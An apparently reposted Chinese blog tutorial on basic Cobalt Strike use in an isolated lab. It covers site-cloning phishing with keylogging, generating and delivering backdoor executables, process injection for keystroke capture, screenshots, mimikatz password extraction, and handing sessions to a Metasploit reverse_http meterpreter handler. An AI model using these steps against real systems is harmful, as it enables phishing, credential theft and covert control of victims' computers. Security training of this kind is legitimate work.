当前位置:网站首页>『渗透基础』Cobalt Strike基础使用入门_Cobalt Strike联动msfconsole

『渗透基础』Cobalt Strike基础使用入门_Cobalt Strike联动msfconsole

2022-06-24 03:55:00 Ho1aAs

本实验在安全隔离环境中运行
仅供教学使用

环境

  • kali:Cobalt Strike4.3,192.168.225.129
  • winxp:192.168.225.130

配置cs

启动cs服务器

首先给cs文件夹权限

chmod -R 777 ./cobaltstrike4.3  

启动cs服务器,teamserver ip password,自定义密码,ip填公网/局域网,不可填127.0.0.1

在这里插入图片描述
默认端口50050

登录客户端

sh ./start.sh

这里由于直接在服务器上面开客户端,所以可以填127.0.0.1,最好还是填局域网IP

在这里插入图片描述

网页钓鱼

选择克隆网站

在这里插入图片描述
克隆目标网站作为钓鱼,勾选记录键盘

在这里插入图片描述
靶机访问并输入文字

在这里插入图片描述
即可截获输入内容

在这里插入图片描述

靶机渗透

创建Listener

先创建监听器

在这里插入图片描述
add一个http监听器,host选择客户端ip

Beacon为内置的Listener,获取shell到CS上,Foreign为外部结合的Listener,常用于MSF的结合

在这里插入图片描述
创建成功

在这里插入图片描述

生成后门

攻击package有四种

在这里插入图片描述

  1. hta
  2. office宏
  3. 自定义payload
  4. exe

演示选择exe,配置对应监听器,然后创建32位的exe

在这里插入图片描述
保存到桌面即可

在这里插入图片描述

如果是hta,运行mshta URL即可

靶机上线

这一步模拟受害者下载恶意exe

*python文件服务器

在桌面运行

python3 -m http.server 8010

在这里插入图片描述
靶机访问,点击运行

在这里插入图片描述
即可触发cs上线

cs自带文件服务器

方便一点,选择文件服务器钓鱼

在这里插入图片描述

选中生成的后门,然后修改一个名字
在这里插入图片描述
靶机访问url,点击运行

在这里插入图片描述
触发cs上线

在这里插入图片描述

修改sleep时间

默认60秒靶机向服务端发包告知存活情况,为了是隐藏自己,并获取一次需要执行的命令,执行渗透要把这个时间缩短才能很好地拿到回显

在这里插入图片描述
改小一点就行,演示改成1s

在这里插入图片描述

读取目录

在这里插入图片描述

在这里插入图片描述

进程注入记录键盘输入

靶机开启一个浏览器

在这里插入图片描述
cs浏览进程

在这里插入图片描述
注入explore.exe,并点击log ketstrokes记录键盘

在这里插入图片描述

注入成功后会有新的进程上线,还是跟上面一样别忘了上线后把sleep调小

在这里插入图片描述

靶机在浏览器输入字符,cs键盘记录窗口收到输入的字符

在这里插入图片描述

截图

在这里插入图片描述
打开截图窗口即可看到

在这里插入图片描述

mimikatz获取密码

在这里插入图片描述

Cobalt Strike联动msfconsole

首先保证cs上线

在这里插入图片描述
创建一个foreign http监听器,ip填公网/局域网,端口弄一个不常用的

在这里插入图片描述
然后cs客户端启动msf,这里ip可以填127

msfconsole
use exploit/multi/handler
set lhost 127.0.0.1
set lport 5555
set payload windows/meterpreter/reverse_http
exploit

相当于靶机的请求通过监听器传到了msf

在这里插入图片描述

配置靶机生成请求

在这里插入图片描述
选择msf的监听器

在这里插入图片描述
等一下即可

在这里插入图片描述

插件安装

用梼杌的插件,解压后load cna文件
在这里插入图片描述
邮件上线机器即可

在这里插入图片描述

参考

https://www.freebuf.com/company-information/167460.html
https://github.com/DeEpinGh0st/Erebus
https://github.com/pandasec888/taowu-cobalt-strike

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/125388547
版权声明:本文为原创,转载时须注明出处及本声明

原网站

版权声明
本文为[Ho1aAs]所创,转载请带上原文链接,感谢
https://ho1aas.blog.csdn.net/article/details/125388547